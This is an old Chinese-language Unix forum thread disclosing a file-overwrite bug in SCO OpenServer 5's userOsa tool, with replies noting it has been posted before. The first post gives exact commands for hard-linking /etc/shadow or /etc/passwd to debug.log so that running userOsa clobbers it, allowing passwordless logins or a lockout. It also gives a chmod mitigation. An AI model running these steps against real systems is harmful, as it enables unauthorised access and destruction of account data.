免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1867 | 回复: 6
打印 上一主题 下一主题

[SCO UNIX] SCO OpenServer 5 的大漏洞 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2003-02-23 23:45 |只看该作者 |倒序浏览
sco unix有一个大bug
1.进入一个你可以写的目录。
2. ln /etc/shadow debug.log
3. /etc/sysadm.d/bin/userOsa >;>;bab
............................
则你的/etc/shadow文件已经被覆盖。任何人可以以任何帐户登录无须密码.
若第二步改为ln /etc/passwd debug.log 则谁也登不上来了!
>;>;bab 是任意敲入的
..........................是程序的显示
注意整个过程中不要离开当前可写目录!
已在unix 5.0.5 &5.0.4上验证。

原理:

SCO /etc/sysadm.d/bin/userOsa 这个程序在运行时会生成一个名叫
debug.log的文件这个文件用户属于root 组属于auth
与shadow文件的一致,而且此程序有BUG不会检查用户权限,因此可以覆盖任何文件,包括passwd和shadow.你在一个可写目录中建立连接(ln命令)将某个文件指向debug.log文件运行userOsa时它将出错信息写入log文件时实际上就覆盖了那个你想破坏的文件!

对于一些机器可以,但是有些SCO机器不知为何

如果SHADOW或PASSWORD文件不能联结,对于一些机器可以,但是有些SCO机器不知为何,不允许我LN这两个文件,报错,不知为何?
答:理论上只要对目录/etc 有读权限,就可以链接。在此例中估计必须用硬链接,若用符号链接ln -s 会因为权限问题未遂。
答复者:Mike Wolf

防范对策

chmod o-x userOsa即可

论坛徽章:
0
2 [报告]
发表于 2003-02-24 00:02 |只看该作者

SCO OpenServer 5 的大漏洞

这个问题SCO发布很久了呀!

论坛徽章:
0
3 [报告]
发表于 2003-02-24 08:20 |只看该作者

SCO OpenServer 5 的大漏洞

在本论坛我是第三次见到!

论坛徽章:
1
荣誉版主
日期:2011-11-23 16:44:17
4 [报告]
发表于 2003-02-24 08:34 |只看该作者

SCO OpenServer 5 的大漏洞

无生相朋友的帖子的确以前别人发过多次了,不过还是积极支持你。对新朋友是非常好的学习资料,对老朋友来说,也是温故而知新嘛。

论坛徽章:
0
5 [报告]
发表于 2003-02-24 10:23 |只看该作者

SCO OpenServer 5 的大漏洞

[quote]原帖由 "zyr2288"]在本论坛我是第三次见到![/quote 发表:


我隻看到兩次

论坛徽章:
0
6 [报告]
发表于 2003-02-24 11:06 |只看该作者

SCO OpenServer 5 的大漏洞

呵呵,我是第一次看到,不过我是新手。应该不为错吧。

论坛徽章:
0
7 [报告]
发表于 2003-02-24 12:41 |只看该作者

SCO OpenServer 5 的大漏洞

我也见到过,只是贴出来要大家注意系统的安全,呵呵,现在的系统不安全阿
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP